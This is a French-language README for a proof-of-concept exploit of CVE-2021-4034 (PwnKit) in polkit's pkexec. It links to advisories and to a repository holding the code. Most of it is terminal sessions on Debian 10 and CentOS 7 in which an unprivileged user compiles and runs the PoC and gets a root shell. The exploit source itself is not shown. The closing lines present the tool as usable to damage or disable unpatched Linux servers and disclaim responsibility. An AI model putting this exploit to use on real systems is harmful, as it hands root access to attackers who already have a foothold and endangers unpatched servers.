
Preuve de concept d'exploitation pour CVE-2021-4034 (PwnKit), une élévation de privilèges locale dans pkexec de polkit, vérifiée sur Debian 10 et CentOS 7.

Bien que la vulnérabilité ne soit pas exploitable à distance et ne permette pas, en soi, l'exécution de code arbitraire, elle peut être utilisée par des attaquants ayant déjà obtenu un point d'appui sur un hôte vulnérable pour élever leurs privilèges et atteindre cette capacité.
https://seclists.org/oss-sec/2022/q1/80https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
Vérifié sur Debian 10 et CentOS 7.
Vous pouvez trouver le dépôt à ce lien ici → https://github.com/Yakumwamba/POC-CVE-2021-4034.git
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)
[user@centos ~]$ grep PRETTY /etc/os-release
PRETTY_NAME="CentOS Linux 7 (Core)"
[user@centos ~]$ id
uid=11000(user) gid=11000(user) groups=11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[user@centos ~]$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
[user@centos ~]$ ./cve-2021-4034-poc
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
Il peut également être utilisé pour endommager ou désactiver des serveurs Linux non corrigés. L'auteur de cet outil n'est pas responsable des dommages ou pertes qui pourraient survenir à la suite de son utilisation.